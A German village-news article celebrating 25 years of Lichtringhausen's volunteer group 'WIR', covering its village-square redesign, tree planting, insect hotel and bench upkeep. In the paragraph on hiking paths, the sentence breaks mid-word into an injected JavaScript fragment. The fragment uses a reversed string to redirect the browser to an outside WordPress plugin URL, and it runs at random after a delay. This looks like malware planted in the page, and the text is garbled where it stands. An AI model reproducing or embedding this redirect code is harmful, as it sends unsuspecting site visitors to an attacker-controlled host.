25 Jahre Gruppe „WIR“
Die Arbeitsgruppe „WIR“ der Dorfgemeinschaft Lichtringhausen kann in diesen Tagen auf ihr 25jähriges Bestehen zurückblicken.
Am 1. Oktober 1996 trafen sich im damaligen Gasthof Kramer in Lichtringhausen 8 Dorfbewohner zu gemeinsamen Überlegungen, wie man die öffentlichen Bereiche im Dorf attraktiver gestalten könnte. Als erste Projektidee wurde die Neugestaltung des Dorfplatzes unter Einbeziehung des schon vorhandenen Ehrenmals für die Opfer der zwei Weltkriege ins Auge gefasst. Nach gründlicher Vorplanung und Sicherstellung der Finanzierung wurde dann in den Jahren 1998 und 1999 der gesamte Dorfplatz neu gestaltet. Dafür leisteten an 48 Arbeitstagen 34 freiwillige Helfer ehrenamtlich insgesamt 900 Arbeitsstunden. Am 29.04.2000 wurde der Platz im Rahmen eines vom Musikverein Lichtringhausen organisierten Festes eingeweiht und von Dechant Vorderwülbecke eingesegnet. Der neu geschaffene Dorfplatz musste auch weiter entwickelt und gepflegt werden. Dazu erklärten sich 14 Helfer, überwiegend rüstige Rentner, bereit. Da es für die Arbeitsgruppe keinen rechtlichen Rahmen gab bezeichnete man sich kurzerhand als Gruppe „WIR“.
Am Dorfplatz wurde in der Folgezeit eine Beleuchtungsanlage mit modernen LED-Strahlern installiert und ein Brunnen angelegt. Neu aufgestellte Schautafeln informieren über die Dorfhistorie, aber auch aktuelle Ereignisse. Ein Maibaum mit daran angebrachten Emblemen der örtlichen Vereine und eine Anschlagtafel informiert über die Vereinsaktivitäten im Dorf. Neben dem Dorfplatz gehört auch die Pflege des Bereiches um die Turnhalle und des Kinderspielplatzes zur ständigen Aufgabe der Gruppe „WIR“.
In weiteren Projekten befasste sich die Gruppe „WIR“ auch mit Themen zur Landschaftsgestaltung und zum Naturschutz. So wurden oberhalb des Friedhofs, im Bereich der Schützenhalle und am Bachlauf des Biekebachs Bäume gepflanzt und Böschungsbefestigungen angelegt. In einem aktuellen Projekt wird im Bereich der ehemaligen Grundschule ein Insektenhotel und eine Wildblumenwiese angelegt. Eine Infotafel wird Interessierte über das Leben im Insektenhotel informieren. Insgesamt wurden in den vergangenen 25 Jahren mehr als 30 Projekte umgesetzt.
Darüber hinaus kümmert sich die Gruppe „WIR“ auch um die Wanderwege rund um Lichtringhausen. So werden in Abstimmung mit dem Seniorenrat der Stadt Attentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorn 22 registrierte Ruhebänke (Rettungsinseln) rund um Lichtringhausen regelmäßig überprüft und instand gehalten.
Aktuell besteht die Gruppe aus 25 Mitgliedern im Alter zwischen 51 und 92 Jahren. Auch in der Zukunft werden sicher noch weitere interessante Aktivitäten durchgeführt.